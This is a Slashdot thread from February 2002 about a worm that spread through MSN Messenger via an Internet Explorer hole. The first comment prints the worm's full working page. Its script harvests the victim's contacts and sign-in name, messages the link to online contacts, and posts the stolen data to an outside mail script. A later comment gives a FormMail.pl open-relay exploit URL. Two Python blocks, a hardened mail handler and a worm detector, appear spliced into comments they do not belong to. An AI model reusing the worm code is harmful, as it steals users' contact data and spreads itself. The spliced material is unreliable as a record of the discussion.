
Microsoft Instant Messenger Virus Sweeps Net

Posted by michael
from the RISKs-of-homogeneous-computing dept.
Many people have reported a Warhol virus affecting users of Microsoft Instant Messenger. If you get messaged, "Go To http://www.masenko-media.net/cool.html NoW !!!", or any similar message (apparently there are several websites with the infection code), I suggest not following the link. A brief discussion follows.

Sequence: Get messaged "Go To http://www.masenko-media.net/cool.html NoW !!!" or something similar with another URL. Follow the link. That webpage contains malicious code which gets your messenger contacts and sends a similar message to your contacts. It looks like it uses a vulnerability in formmail.pl as well, although I'm not exactly sure how (I'm not an expert in ECMAscript, sorry, and I have no systems that could possibly be affected by this to test with). I'm sure some of our readers can provide more information in the comments below.

There appear to be several webpages which carried the infected code, not just masenko-media.net. Some webmasters are already taking them down.

Sophistication: moderate. Damage: only your pride.

Solution: probably the latest mega-patch for Internet Explorer will fix the Microsoft bug that allowed this.

Risks: obviously, the code could have done worse than just messaging your contacts. With Microsoft making "messaging" an integrated part of the operating system, any flaws in it can be exploited to affect millions of people instantly, so it is a high-value target. Does it have commensurate high-strength security?

  • The Code (Score:5, Informative)

    by nihilist_1137 (536663) on Wednesday February 13, 2002 @08:07PM (#3004066) Homepage
    Use Trillian: http://www.trillian.cc. A few people msg'd me with the link. All that happens is that a blank window pops up. Mind you, I am on dual monitors so that may have had something to do with it. The code for the page (http://www.masenko-media.net/cool.html) is:

    <html>
    <head>
    <title>Welcome</title>
    <Script>

    var msnWin;
    var msnList;
    var msgStr = "Go To http://www.masenko-media.net/cool.html NoW !!!";

    function Go(){

    msnWin = document.open("res://mshtml.dll/blank.htm", "", "fullscreen=1");
    msnWin.resizeTo(1, 1);
    msnWin.moveTo(10000, 10000);
    msnWin.document.title = "Please Wait...";
    msnWin.document.body.innerHTML = '<object classid="clsid:F3A614DC-ABE0-11d2-A441-00C04F795683" id="msnObj1"></object><object classid="clsid:FB7199AB-79BF-11d2-8D94-0000F875C541" id="msnObj2"></object>';
    focus();

    if (msnWin.msnObj1.localState == 1){
    msnWin.msnObj2.autoLogon();
    }
    Contacts();
    Send();
    msnWin.close();
    document.contents.submit();
    }

    function Contacts(){
    msnList = msnWin.msnObj1.list(0);
    document.contents.email.value = msnWin.msnObj1.localLogonName;
    document.contents.subject.value = Date();
    var msnStr = "<br>";

    for (i=0;i<msnList.count;i++){
    if (msnList(i).state >1){
    msnStr += "Online Contact: " + msnList(i).FriendlyName + ", email: " + msnList(i).LogonName + "<br>";
    }

    else{
    msnStr += "Offline Contact: " + msnList(i).FriendlyName + ", email: " + msnList(i).LogonName + "<br>";
    }
    }
    document.contents.contentBox.value = msnStr;
    }

    function Send(){
    for (i=0;i<msnList.count; i++){
    if (msnList(i).state >1){
    msnList(i).sendText("MIME-Version: 1.0\r\nContent-Type: text/plain; charset=UTF-8\r\n\r\n", msgStr, 0);
    }
    }
    }

    </Script>
    </head>
    <body onload="Go()">
    <p align="center">&nbsp;
    <p align="center">&nbsp;</p>
    <p align="center">&nbsp;</p>
    <p align="center">&nbsp;</p>
    <p align="center"><font face="Arial">
    Please Wait...</font></p>
    <form METHOD="POST" ACTION="http://www.yong.f2s.com/mailform.pl" NAME="contents" ID="Form1">
    <input type="hidden" name="redirect" value="http://www.rjdesigns.co.uk/cool/go.htm" ID="Hidden1">
    <input type="hidden" name="recipient" value="mmargae@wanadoo.nl" ID="Hidden5">
    <input type="hidden" name="email">
    <input type="hidden" name="subject">
    <input type="hidden" NAME="contentBox" id="Hidden6">
    <input type=hidden name="env_report" value="REMOTE_HOST,HTTP_USER_AGENT">
    </form>
    </body>
    </html>
  • Not a Messenger flaw (Score:5, Informative)

    by Osty (16825) on Wednesday February 13, 2002 @08:08PM (#3004076)

    First off, this is not a virus. It's an Internet Explorer exploit allowing access to your Messenger contact list and other Messenger functions. As the post noted, it is fixed with the latest IE patch. The actual problem was with IE's document.open scripting object, and how it was able to access local system objects from web sites (basically, the about: URI namespace was considered to be in the "My Computer" security domain, which means it had much more lax security than an actual website. However, since about: can take valid html, site developers were able to embed Messenger objects in about: pages, and access information from that). This is not a problem with Messenger at all.


    Install the patch and be done with it.

  • Re:Other clients? (Score:5, Informative)

    by Static_Neurotoxin (141004) <static+slashdot@neurotoxin.net> on Wednesday February 13, 2002 @08:09PM (#3004078) Homepage
    Trillian is safe. Opera is safe. The only combo you need to worry about is IE and Messenger.
  • by rogueuk (245470) on Wednesday February 13, 2002 @08:09PM (#3004080) Homepage
    The Register [theregister.co.uk] had an article about this a few days ago. A flawed Document.Open() in the script apparently causes it. The demo site the Reg links to is pretty interesting. And of course, MS has known about this since December :-P
  • Warhol? worm (Score:5, Informative)

    by blkros (304521) <blkros@[ ]oo.com ['yah' in gap]> on Wednesday February 13, 2002 @08:10PM (#3004085)
    The worm seems to be named because of a quote that the site attributes to Andy Warhol (i.e. 'in the future everyone will have his 15 minutes of fame'). That quote should actually be attributed to Marshall McLuhan, who Andy ripped it off from. So these worms should be named McLuhan worms.
  • Re:Other clients? (Score:2, Informative)

    by Qwerpafw (315600) on Wednesday February 13, 2002 @08:12PM (#3004096) Homepage
    Fire (like Trillian, but for OS X) doesn't seem to care. At least, as far as I can tell. Most likely the security hole lies in Windows/MSN integration, or in the MSN client software. But not the messaging protocol.

    Of course, the trillian people have a MUCH better track record in terms of patches and so forth (they keep updating so it'll work with AOL...) so even if it affects trillian (pretty sure the answer is NO...) they will fix it before M$.
  • by jfroot (455025) <darmok@tanagra.ca> on Wednesday February 13, 2002 @08:14PM (#3004112) Homepage
    Just go to the registrar www.godaddy.com:

    MASENKO-MEDIA.NET WHOIS results:

    The data contained in Go Daddy Software, Inc.'s WHOIS database, while believed by the company to be reliable, is provided "as is" with no guarantee or warranties regarding its accuracy. This information is provided for the sole purpose of assisting you in obtaining information about domain name registration records. Any use of this data for any other purpose, including, but not limited to, allowing or making possible dissemination or collection of this data in part or in its entirety for any purpose, such as the transmission of unsolicited advertising and solicitations, is expressly forbidden without the prior written permission of Go Daddy Software, Inc. By submitting an inquiry, you agree to these terms of usage and limitations of warranty.

    Registrant:
    Net Crater
    NetCrater
    502 Summit ST
    Walnut Cove, North Carolina 27052
    United States

    Registrar: Go Daddy Software (http://registrar.godaddy.com)
    Domain Name: MASENKO-MEDIA.NET
    Created on: 06-Feb-02
    Expires on: 06-Feb-03
    Last Updated on: 06-Feb-02

    Administrative Contact:
    Crater, Net domains@netcrater.com
    NetCrater
    502 Summit ST
    Walnut Cove, North Carolina 27052
    United States
    3365917696

    Technical Contact:
    Crater, Net domains@netcrater.com
    NetCrater
    502 Summit ST
    Walnut Cove, North Carolina 27052
    United States
    3365917696

    Domain servers in listed order:
    NS1.NETCRATER.COM
    NS2.NETCRATER.COM
  • Re:The Code (Score:2, Informative)

    by suwain_2 (260792) on Wednesday February 13, 2002 @08:14PM (#3004116) Journal
    $ wget http://www.masenko-media.net/cool.html
    --19:08:55--  http://www.masenko-media.net/cool.html
               => `cool.html'
    Connecting to www.masenko-media.net:80... connected!
    HTTP request sent, awaiting response... 404 Not Found
    19:08:55 ERROR 404: Not Found.

    Seems they took it down? Now is this just going to have millions of people getting 404 messages?

  • Re:This is news? (Score:2, Informative)

    by joshsisk (161347) on Wednesday February 13, 2002 @08:15PM (#3004126)
    Uh, so people can download the patch before they get the virus, maybe?
  • by bovinewasteproduct (514128) <gclarkii@gbdi s p a t c h.com> on Wednesday February 13, 2002 @08:17PM (#3004147) Homepage
    You might try just the domain name. Which comes out to:
    Registrant:
    Net Crater
    NetCrater
    502 Summit ST
    Walnut Cove, North Carolina 27052
    United States

    Registrar: Go Daddy Software (http://registrar.godaddy.com)
    Domain Name: MASENKO-MEDIA.NET
    Created on: 06-Feb-02
    Expires on: 06-Feb-03
    Last Updated on: 06-Feb-02
    Administrative Contact:
    Crater, Net domains@netcrater.com
    NetCrater
    502 Summit ST
    Walnut Cove, North Carolina 27052
    United States
    3365917696
    Technical Contact:
    Crater, Net domains@netcrater.com
    NetCrater
    502 Summit ST
    Walnut Cove, North Carolina 27052
    United States
    3365917696

    Domain servers in listed order:
    NS1.NETCRATER.COM
    NS2.NETCRATER.COM

    Looks fine to me..:)

    BWP
  • formmail.pl (Score:5, Informative)

    by TheFlu (213162) on Wednesday February 13, 2002 @08:22PM (#3004177) Homepage
    Just an FYI about the lack of security on older versions of formmail.pl. You should replace the exploitable version if you are using it yourself.

    Formmail.pl Can Be Used As An Open Mail Relay

    Summary
    The CGI program Formmail.pl lacks adequate security checks and allows spammers to send anonymous e-mail using vulnerable hosts as mail relays.
    This vulnerability has already been exploited by spammers in many installations of Formmail.pl.

    Details
    Matt Wright's formmail.pl program does a "security check" on the HTTP_REFERER server variable. The security check is usually used to verify that information submitted from a form came from a proper or designated domain. This is usually done to prevent someone from creating a local, malicious form to submit to a script. This can be easily bypassed by passing a raw HTTP request and faking the HTTP Referer. This script also allows you to set the recipient's email address in the form. These two factors allow a malicious user to use the formmail.pl program to distribute their email (SPAM).

    Exploit:
    A URL such as the following:
    http://www.example.com/cgi-bin/FormMail.pl?recipient=email@address-to-spam.com&message=Proof%20that%20FormMail.pl%20can%20be%20used%20to%20send%20anonymous%20spam.

    Will send an anonymous e-mail if the installed FormMail.pl is vulnerable.

    Workaround:
    1. Remove your formmail.pl script until the author provides a fix.
    or:
    2. Hard code the recipient's email address in the formmail.pl program. Do not rely on the address submitted by the user.
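    As an added illustration of workaround 2 above (example code, not the advisory's or FormMail.pl's own), here is a form-mail handler in both shapes: the original pattern, which trusts a client-supplied recipient behind a Referer check, and the hardened one, which fixes the recipient server-side and refuses client-chosen targets. The allowed host and site recipient are placeholders, and the request is constructed from the advisory's example URL.

```python
import re
from typing import Mapping, Optional

# Hypothetical site settings; placeholders, not values from the page.
ALLOWED_REFERER_HOSTS = ("www.example.com",)
SITE_RECIPIENT = "webmaster@example.com"      # hard-coded, as workaround 2 recommends
ALLOWED_FIELDS = {"email", "subject", "message"}


class RelayRejected(ValueError):
    """The request would turn the handler into an open mail relay."""


def referer_looks_local(headers: Mapping[str, str]) -> bool:
    """FormMail's original 'security check'. Any client can set this header
    in a raw HTTP request, so a True here proves nothing."""
    m = re.match(r"https?://([^/]+)", headers.get("Referer", ""))
    return bool(m) and m.group(1).lower() in ALLOWED_REFERER_HOSTS


def vulnerable_build_mail(form: Mapping[str, str], headers: Mapping[str, str]) -> dict:
    """Old pattern: the delivery address comes from the form, gated only by Referer."""
    if not referer_looks_local(headers):
        raise RelayRejected("referer check failed")
    return {"to": form["recipient"],
            "subject": form.get("subject", ""),
            "body": form.get("message", "")}


def hardened_build_mail(form: Mapping[str, str], headers: Mapping[str, str]) -> dict:
    """Recipient is fixed server-side; client-chosen targets and stray fields are refused."""
    if "recipient" in form or "redirect" in form:
        raise RelayRejected("client may not choose the delivery or redirect target")
    extra = set(form) - ALLOWED_FIELDS
    if extra:
        raise RelayRejected("unexpected fields: " + ", ".join(sorted(extra)))
    sender: Optional[str] = form.get("email") or None
    if sender and not re.fullmatch(r"[^@\s]+@[^@\s]+\.[^@\s]+", sender):
        raise RelayRejected("malformed sender address")
    subject = form.get("subject", "")
    if "\r" in subject or "\n" in subject:       # keep form data out of mail headers
        raise RelayRejected("line break in subject")
    return {"to": SITE_RECIPIENT,                # never the client's choice
            "reply_to": sender,
            "subject": subject,
            "body": form.get("message", ""),
            "referer_seen": referer_looks_local(headers)}  # logged, not trusted


# Constructed request mirroring the advisory's example URL, sent with a forged Referer.
SPAM_FORM = {"recipient": "email@address-to-spam.com",
             "message": "Proof that FormMail.pl can be used to send anonymous spam."}
FORGED_HEADERS = {"Referer": "http://www.example.com/contact.html"}


def demo() -> tuple:
    """Returns (where the old handler would deliver, whether the hardened one refuses)."""
    old_target = vulnerable_build_mail(SPAM_FORM, FORGED_HEADERS)["to"]
    try:
        hardened_build_mail(SPAM_FORM, FORGED_HEADERS)
        refused = False
    except RelayRejected:
        refused = True
    return old_target, refused


if __name__ == "__main__":
    print(demo())
```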
  • by joemiah (2398) on Wednesday February 13, 2002 @08:25PM (#3004198)
    It spreads through your contacts, so the recipients are more than likely receiving the URL from someone they know.
  • Re:Gee... (Score:4, Informative)

    by Cally (10873) on Wednesday February 13, 2002 @08:25PM (#3004204) Homepage
    Well this is Waaaay off-topic... but WTF ;)

    Is this really a surprise? God forbid Microsoft ever tried to make medical equipment.


    According to RISKS Digest, someone went along to watch a friend getting laser eye surgery & noticed (a) the technician was blindly hitting RETURN to clear pesky annoying error messages, and (b) the machine was running Win95. Oh, and this machine was taking the details of the subject's eye geometry, & controlling the laser that was about to shave a thin slice off the front of the eyeball to correct some minor astigmatism (IIRC; don't have the url to hand, anyone? )
  • by lblack (124294) on Wednesday February 13, 2002 @08:26PM (#3004206)
    Have any A/V companies deployed products to protect against instant messaging vulnerabilities? I know that Bitdefender [bitdefender.com] have a product that helps to increase your security when running such services, but I haven't heard of similar things from Norton/McAfee.

    I always thought this was kinda silly, waiting for the horse to leave before closing the stable. Did anybody not view Instant Messenger traffic, especially once it got into a high level of file transfer interaction, as not being a platform for the deployment of viruses?

    Still, this is a social engineering thing more than it is anything else. It's not even really a virus -- it's a piece of destructive code delivered via social engineering. It is not really self-propagating, though, in that it requires the server-side in order to be malicious, or do anything at all.

    That seems to me to be stretching "virus" a bit. Maybe "viral meme"? I agree it does spread a bit like a virus, but it actually requires fetching external information.

    -l

    P.S. Bitdefender are beta'ing a Linux product, by the way. It's not Open, but the beta is a free (as in beer) download. Disclaimer: I'm a fan of that company. ;)

  • by CrayzyJ (222675) on Wednesday February 13, 2002 @08:29PM (#3004220) Homepage Journal
    "somebody they don't know"

    It says that the virus sends the msg to people in the contact list. Hence, you'd get messages from your friends/family/whatever.

  • by Wizard of OS (111213) on Wednesday February 13, 2002 @08:29PM (#3004221)
    Look closely:

    <input type="hidden" name="recipient" value="mmargae@wanadoo.nl" ID="Hidden5">

    I think somebody forgot that HTML source can be viewed ...

    The nasty part: every time somebody looks at this page, his MSN-email address is being posted to this mailform.pl script (the web equivalent of an open relay) and it is sent to this wanadoo.nl user.
  • Why this is news (Score:3, Informative)

    by jeff13 (255285) on Wednesday February 13, 2002 @08:34PM (#3004252) Homepage
    People keep going on (posting here that is) as if this is some sort of sensationalization of Microsoft security issues. As if other media outlets jump on Microsoft like vultures. Well, wake up, they don't (imho). The 'straight' media tends to avoid bad business news, especially given the danger of being sued by the most politically powerful, media powerful, and just plain rich powerful, software company around. Hmmm, AOL/Time don't count right?

    Just because it's the latest #@#k up from Microsoft doesn't diminish its importance as news.

    How many times have I shocked an Internet user (years of tech support, I'm so bitter!) by exploiting IExploder silliness and effectively cracking the luser's OS? They were none too pleased, I have to say. It's not like I can even code really, I'm a moron with programming. But if I can do it...

    And it's better to find out about these things in the news, not the hard way!
  • by nweaver (113078) on Wednesday February 13, 2002 @08:58PM (#3004366) Homepage

    Warhol style worms are purely active worms, which require no human intervention to spread. This worm sounds like an intervention-required worm/trojan (like a mailworm) but which spreads through MSN instead of email.

    It would be a warhol-like worm if the message sent automatically opened the web page, making it a purely autonomous worm. I sorta wish it was, because that would be an interesting validation of the speed of topologically aware active worms. Then again, I don't use MSN Messenger.

    For those who are interested, a more formal analysis is available Here [berkeley.edu], a paper I submitted to Usenix Security on the subject.

  • Re:Gee... (Score:5, Informative)

    by Frater 219 (1455) on Wednesday February 13, 2002 @09:31PM (#3004497) Journal
    According to RISKS Digest, someone went along to watch a friend getting laser eye surgery & noticed (a) the technician was blindly hitting RETURN to clear pesky annoying error messages, and (b) the machine was running Win95. Oh, and this machine was taking the details of the subject's eye geometry, & controlling the laser that was about to shave a thin slice off the front of the eyeball to correct some minor astigmatism (IIRC; don't have the url to hand, anyone? )

    A quick Google search for "risks digest eye surgery" yields this link [ncl.ac.uk]. Pretty frightening stuff, and it does show how well many users have become trained to treat error conditions as part of the normal behavior of computer operating systems and applications.

  • by silicon_synapse (145470) on Wednesday February 13, 2002 @09:40PM (#3004547)
    Yes, but if it was an organized effort directed at the site for the express purpose of bringing it down, the guys at OSDN could be held liable for a DDoS.
  • by ahde (95143) on Wednesday February 13, 2002 @09:40PM (#3004551) Homepage
    They're ActiveX viruses, and will do more than send MSN Messages to your friends if you're using IE.
  • masenko-media.net (Score:1, Informative)

    by Anonymous Coward on Wednesday February 13, 2002 @10:15PM (#3004711)
    WHOIS information for masenko-media.net:


    Registrant:
    Net Crater

    Registrar: Go Daddy Software (http://registrar.godaddy.com)
    Domain Name: MASENKO-MEDIA.NET

    Domain servers in listed order:
    NS1.NETCRATER.COM
    NS2.NETCRATER.COM

  • by mech9t8 (310197) on Wednesday February 13, 2002 @10:22PM (#3004745)
    You can delete the references to the Messenger object in the registry. It leaves Messenger unaffected but disables the web object.

    Remove the following registry keys:

    HKEY_CLASSES_ROOT\CLSID\{F3A614DC-ABE0-11d2-A441-00C04F795683}
    HKEY_CLASSES_ROOT\CLSID\{FB7199AB-79BF-11d2-8D94-0000F875C541}
    HKEY_CLASSES_ROOT\Messenger.MsgrObject

    and there's another Messenger.* object, but I forget what it was... but if you get the CLSIDs that should cover it...

    You can just rename them to backup_FB7199AB-79BF-11d2-8D94-0000F875C541 or whatever if you want to be cautious.

    You'll need to remove them again if you upgrade or reinstall - it'll put the references back.
  • Re:formmail.pl (Score:3, Informative)

    by babbage (61057) <cdevers@NosPaM.cis.usouthal.edu> on Thursday February 14, 2002 @12:16AM (#3005174) Homepage Journal
    As I understand it, Matt Wright has indicated that he doesn't have much interest in updating his old software anymore, so "official" bugfixes are unlikely to be forthcoming. As another commenter noted, the NMS [sourceforge.net] group is working on a suite of drop-in replacements for each of the scripts that Matt wrote years ago, and among them is a very good replacement for FormMail.pl. These newer scripts are being developed with security and robustness in mind from the ground up.

    Even in cases where it might be safer & more efficient to use libraries from CPAN, the NMS group has deliberately decided to not make use of these libraries, so that novice developers could make use of these more reliable scripts without having to perform any configuration more advanced than setting a few variables and writing a little bit of HTML (which, presumably, they'll be more comfortable with anyway).

    Exploits like this are exactly why people should migrate the old Matt Wright code to NMS, which can be dropped in and up & running very quickly. It's easy, and it's much safer. It's the right thing to do.

  • by Osty (16825) on Thursday February 14, 2002 @12:40AM (#3005246)

    Hmm ... or maybe it's because that problem with Linux went away a long time ago. A default workstation install of Red Hat Linux 7.2 has zero open ports and a firewall that blocks access to all ports under 1024.

    Except that Red Hat Linux 7.2 is not exactly all that old. Even as recently as RedHat 7.0, there were still security problems with a default install. That's what, a year old? And RedHat is not the only distro out there. And not everybody installing today is installing the latest versions. I spoke with a guy just recently who wanted to install SuSE 6.0 (SuSE is at version 7.3, now. 6.0 is roughly 2-2.5 years old, or so), simply because those were the CDs he had on-hand. I constantly see people trying to install RedHat 6.2, and even 5.2. As well, your argument is ignoring all those people that installed Linux back during the whole dot-bomb bubble (because Linux was the up-and-coming cool thing to have), and promptly forgot about that system in their back room running it. That's what, RedHat 6.0? SuSE 6.0? Slackware 4.0? Those installations are still a problem even today.


    Now, obviously if someone sets up a server and doesn't patch, that person is an idiot (and that is true no matter what OS he/she is running). Unfortunately for your argument, we're talking about an instant messenger client and a web browser, not things that are likely to be installed on a server. The fact is, you can't exploit my Linux system via Mozilla/Konq/Galeon/Netscape, yet every other week, a new way to exploit Windows using IE pops up.

    Right. Anyone setting up a server and not patching is an idiot. But that doesn't mean people aren't doing just that. Both Microsoft and RedHat have taken steps to protect against that, yet Microsoft is vilified while RedHat is heralded. That was exactly the point of the AC's comment. Yes, this article was about an IE exploit. Yes, his comment was off-topic. No, his comment is not ungrounded. Within the scope of his comment pertaining to servers, you know what he said is true. You might not want to believe it, but it is. Anyway, the reason why you don't see many exploits for Mozilla/Konq/Galeon/Netscape (three of which are all based on a single rendering engine, and the fourth can use that same engine as well) is because they are small potatoes compared to IE. There's just not much reason for hax0rs to spend their time finding exploits in those browsers when they're only going to hit maybe 5% of the browsing public (and I'm being generous). Microsoft software really doesn't have significantly more problems than any other software. Microsoft is simply a large target, and so many and more people spend much more time finding those holes (often for malicious purposes, sadly).


  • by WhiteKnight07 (521975) on Thursday February 14, 2002 @12:43AM (#3005259)
    The "Uber Patch" is available for download here [microsoft.com].
  • Re:The Code (Score:2, Informative)

    by c0wh (445032) on Thursday February 14, 2002 @12:57AM (#3005311)

    To nitpick a bit, this tactic is actually used to hide the window in all respects but its entry in the taskbar. (it's resized to one pixel tall and wide, and moved way off the lower right corner, unless your screen resolution is above 10,000 x 10,000.)

    Popups like this usually avoid being noticed, so they can launch normal pop up ads at thirty second intervals if they so choose.

    I can't stand this crap. Mozilla has gone in a great direction by disabling any "window.open" calls except from user generated events. (no more popups "onLoad" or "onUnload," if you enable that feature)
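    An added detection example in Python (not code from any comment here) that scans a saved page for the traits described in the posted cool.html source and in c0wh's note above: a document.open() on a local res:/about: URL, a window shrunk to one pixel and moved far off-screen, the two Messenger CLSIDs from the page, and a hidden recipient field posted on load to a mail script. The two sample pages are constructed for the test; the off-screen threshold and the trigger count are assumptions.

```python
import re
from typing import Dict, List

# The two Messenger ActiveX CLSIDs that the posted cool.html embeds (copied from the page).
MESSENGER_CLSIDS = {
    "F3A614DC-ABE0-11D2-A441-00C04F795683",
    "FB7199AB-79BF-11D2-8D94-0000F875C541",
}
OFFSCREEN_PX = 4000      # constructed threshold: a moveTo() beyond this is "off-screen"
MIN_TRIGGERS = 4         # constructed threshold for the overall verdict

_SCRIPT = re.compile(r"<script\b[^>]*>(.*?)</script>", re.I | re.S)
_LOCAL_OPEN = re.compile(r"""document\.open\(\s*["'](?:res|about):""", re.I)
_RESIZE = re.compile(r"resizeTo\(\s*(\d+)\s*,\s*(\d+)\s*\)", re.I)
_MOVE = re.compile(r"moveTo\(\s*(\d+)\s*,\s*(\d+)\s*\)", re.I)
_CLSID = re.compile(r"""classid\s*=\s*["']?clsid:([0-9a-f-]{36})""", re.I)
_INPUT = re.compile(r"<input\b[^>]*>", re.I)
_FORM_ACTION = re.compile(r"""<form\b[^>]*action\s*=\s*["']?([^"'\s>]+)""", re.I)
_ONLOAD = re.compile(r"<body\b[^>]*\bonload\s*=", re.I)


def analyse(html: str) -> Dict[str, object]:
    """Return one entry per trait; a truthy value means the trait was seen."""
    script = " ".join(_SCRIPT.findall(html))
    findings: Dict[str, object] = {}
    findings["local_window_open"] = bool(_LOCAL_OPEN.search(script))
    findings["shrunk_to_pixel"] = any(int(w) <= 1 and int(h) <= 1
                                      for w, h in _RESIZE.findall(script))
    findings["moved_offscreen"] = any(int(x) >= OFFSCREEN_PX or int(y) >= OFFSCREEN_PX
                                      for x, y in _MOVE.findall(script))
    # The object tags sit inside a script string on the original page, so scan all of it.
    seen = {c.upper() for c in _CLSID.findall(html)}
    findings["messenger_objects"] = sorted(seen & MESSENGER_CLSIDS)
    hidden_recipient = False
    for tag in _INPUT.findall(html):
        low = tag.lower()
        if "hidden" in low and re.search(r"""name\s*=\s*["']?recipient\b""", low):
            hidden_recipient = True
    findings["hidden_recipient_field"] = hidden_recipient
    actions = _FORM_ACTION.findall(html)
    findings["posts_to_mail_script"] = any(a.lower().endswith((".pl", ".cgi")) for a in actions)
    findings["runs_on_load"] = bool(_ONLOAD.search(html))
    return findings


def triggered(html: str) -> List[str]:
    """Names of the traits present, in analyse() order."""
    return [name for name, value in analyse(html).items() if value]


def is_messenger_worm_page(html: str) -> bool:
    return len(triggered(html)) >= MIN_TRIGGERS


# Constructed sample with the same skeleton as the posted page (no contact/send logic).
SAMPLE_WORM_PAGE = """<html><head><title>Welcome</title>
<Script>
function Go(){
  w = document.open("res://mshtml.dll/blank.htm", "", "fullscreen=1");
  w.resizeTo(1, 1);
  w.moveTo(10000, 10000);
  w.document.body.innerHTML = '<object classid="clsid:F3A614DC-ABE0-11d2-A441-00C04F795683" id="msnObj1"></object>'
    + '<object classid="clsid:FB7199AB-79BF-11d2-8D94-0000F875C541" id="msnObj2"></object>';
  document.contents.submit();
}
</Script></head>
<body onload="Go()">
<form METHOD="POST" ACTION="http://mail.example.invalid/mailform.pl" NAME="contents">
<input type="hidden" name="recipient" value="collector@example.invalid">
<input type="hidden" name="email">
</form></body></html>"""

# Constructed benign page: an onload handler and a normal contact form, nothing else.
SAMPLE_BENIGN_PAGE = """<html><body onload="init()"><script>
function init(){ window.resizeTo(800, 600); }
</script><form action="/contact" method="post"><input type="text" name="email"></form>
</body></html>"""

if __name__ == "__main__":
    print(triggered(SAMPLE_WORM_PAGE), is_messenger_worm_page(SAMPLE_WORM_PAGE))
    print(triggered(SAMPLE_BENIGN_PAGE), is_messenger_worm_page(SAMPLE_BENIGN_PAGE))
```

    Run it over locally saved copies of suspect pages; a verdict is only a triage hint, so the full finding list is what should go in the ticket.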

  • by Anonymous Coward on Thursday February 14, 2002 @01:11AM (#3005354)
    I thought the title meant a warhol worm [berkeley.edu] at first.

    World-wide worm propagation in 15 minutes. Finally something worth the attention given to not-so-well designed worms such as code red.
  • by Anonymous Coward on Thursday February 14, 2002 @01:14AM (#3005360)
    Edit \WINDOWS\inf\sysoc.inf and look for
    msmsgs=msgrocm.dll,OcEntry,msmsgs.inf,hide,7
    Delete the hide part; then you can uninstall MS Messenger using Add/Remove Windows Components.
    msmsgs=msgrocm.dll,OcEntry,msmsgs.inf,,7 is what it should look like in the end.
  • Explanation of code (Score:3, Informative)

    by tomgilder (255203) on Thursday February 14, 2002 @04:28AM (#3005755) Homepage
    Hi there, I was the one along with Thor Larholm who originally demoed this exploit on my website [tom.me.uk].

    We did so as to attempt to put pressure on Microsoft to patch several major holes in Internet Explorer - the one we exploited (document.open) took MS exactly fifty-four days to make a patch for, from it being publicly disclosed.

    We felt this was pathetic, and the public had a right to know what Microsoft's bad programming could cause - none of the previous examples of the document.open hole had shown to what extent this could be exploited.

    This new worm, although harmless, is a direct rip of the example code [slashdot.org] from our bulletin, modified to also e-mail the contact list and MSN sign-in name to an e-mail address.

    As long as Microsoft continues to support the flawed security model of ActiveX, integrating products together this closely, such things will continue to happen.

    The next MSN worm might be far worse.

    Please, please, all Internet Explorer users patch your systems now [microsoft.com]. If you are using IE5.0 or lower, MS haven't produced a patch for you - they clearly care more about their product lifecycles than customers' security. I strongly suggest upgrading to 5.5 or 6; failing that, disable active scripting.

    I'm also interested as to why Slashdot felt the need to approve this article about a worm, as several people submitted stories about my original MSN exploit example. Oh well, guess you need things in the wild before telling people?

  • by IamTheRealMike (537420) <mike@plan99.net> on Thursday February 14, 2002 @06:46AM (#3005997) Homepage
    This happens all the time, there are in fact several different MSN Messenger virii, not all of which use IE. Some of them just send files to you, such as the infamous ;) Choke virus.

    What pisses me off about this is that Microsoft is the one who makes all the money from this, yet I am the one who has to clean up my friends' computers every third Tuesday for them, because MSN allows any program (or indeed website; it's used on the MSN portal pages) to access its internal objects via COM. Not that there is anything wrong with this idea, but due to their lax coding, it's people like me who get to pick up the pieces.

    As I access MSN via Jabber I can't be infected with these viruses anyway, but the fact that MSN isn't even a particularly great chat program especially rankles.

  • by Sklivvz (167003) <marco.cecconi@gmail . c om> on Thursday February 14, 2002 @08:07AM (#3006189) Homepage Journal
    The patch does not work!!!! See here! [securityfocus.com]

    thanks bill.... :-(
